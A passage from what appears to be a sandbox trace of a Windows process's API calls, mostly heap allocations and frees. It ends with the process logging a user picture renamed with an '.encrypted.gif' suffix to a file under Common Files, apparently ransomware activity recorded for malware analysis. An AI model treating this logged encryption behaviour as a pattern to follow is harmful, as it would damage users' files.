RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0041.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0041.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0041.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0041.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0041.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0041.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0041.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0041.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.558] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.558] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0041.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0041.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0041.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0041.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0041.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0041.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0041.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0041.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0041.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0041.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0041.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0041.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0041.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0041.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0041.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.559] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0041.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0041.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0041.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0041.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0041.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0041.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0041.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0041.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0041.560] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0041.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0041.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0041.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0041.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0041.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0041.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0041.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0041.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x120) returned 0x7c5448 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0041.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0041.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xaa0008 [0041.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.562] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.562] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.562] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0041.562] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.562] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.563] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0041.563] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x31b2, lpOverlapped=0x0) returned 1 [0041.564] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0041.564] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x31b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.564] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.encrypted.gif\r\n", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0041.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4c) returned 0x7f36e0 [0041.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.encrypted.gif\r\n", cchWideChar=76, lpMultiByteStr=0x7f36e0, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.encrypted.gif\r\n", lpUsedDefaultChar=0x0) returned 76 [0041.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0041.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0041.564] WriteFile (in: hFile=0x140, lpBuffer=0x7f3688*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3688*, lpNumberOfBytesWritten=0x6aee3c*=0x4b, lpOverlapped=0x0) returned 1 [0041.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0041.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.565] CloseHandle (hObject=0x140) returned 1 [0041.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0041.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0041.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0041.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0041.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0041.567] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0041.567] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0041.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: 